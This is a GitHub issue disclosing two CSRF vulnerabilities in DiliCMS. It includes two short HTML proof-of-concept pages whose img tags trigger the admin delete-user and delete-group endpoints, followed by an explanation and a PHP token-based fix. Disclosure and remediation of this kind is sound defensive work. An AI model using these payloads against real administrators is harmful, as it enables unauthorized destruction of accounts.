chekun/DiliCMS

There are two CSRF vulnerabilities that can delete a user or a usergroup

Rich4ever opened this issue · 1 comment

Software Link: https://github.com/chekun/DiliCMS
After the administrator has logged in, open the page.
test.html delete user POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
  </body>
</html>

test2.html delete group POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
  </body>
</html>
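Both POCs work for the same reason: the delete endpoints accept a plain GET request and rely only on the admin's session cookie, which the browser attaches automatically to the request triggered by the `<img>` tag. The following is an added example of the standard fix (the synchronizer-token pattern), written here for this report and not taken from DiliCMS; it is generic PHP and assumes a PHP session and a hypothetical `handle_delete_user` handler and `$delete` callback standing in for the application's real delete routine.

```php
<?php
// Added example, not DiliCMS code. Assumes a PHP session is available.
session_start();

// Issue one random token per session; the attacker's page cannot read it,
// so it cannot be included in a cross-site request.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_check(array $post, array $session): bool
{
    return isset($post['csrf_token'], $session['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Hypothetical delete handler: state changes only via POST, and only with
// a valid token. Returns the HTTP status that should be sent back.
function handle_delete_user(string $method, array $post, array $session, callable $delete): int
{
    if ($method !== 'POST') {
        return 405; // a GET from an <img> tag never reaches the delete
    }
    if (!csrf_check($post, $session)) {
        return 403; // cross-site form posts lack the session-bound token
    }
    $delete((int) ($post['id'] ?? 0));
    return 200;
}

// Routing glue for a request to this script (delete callback is a stub here).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $status = handle_delete_user(
        $_SERVER['REQUEST_METHOD'],
        $_POST,
        $_SESSION,
        function (int $id): void { /* real code would delete user $id here */ }
    );
    http_response_code($status);
    exit;
}
?>
<!-- The legitimate admin page embeds the token in a POST form. -->
<form method="post" action="">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="hidden" name="id" value="1">
  <button type="submit">Delete user 1</button>
</form>
```

Requiring POST alone is not sufficient, since a hidden auto-submitting form on an attacker's page can also POST; the token is what ties the request to the admin's own session. Setting the session cookie with `SameSite=Lax` or `Strict` adds a second, browser-enforced layer, and an access log showing `GET .../user/del/<id>` requests with an external `Referer` is a simple indicator that this kind of request is being triggered from another site.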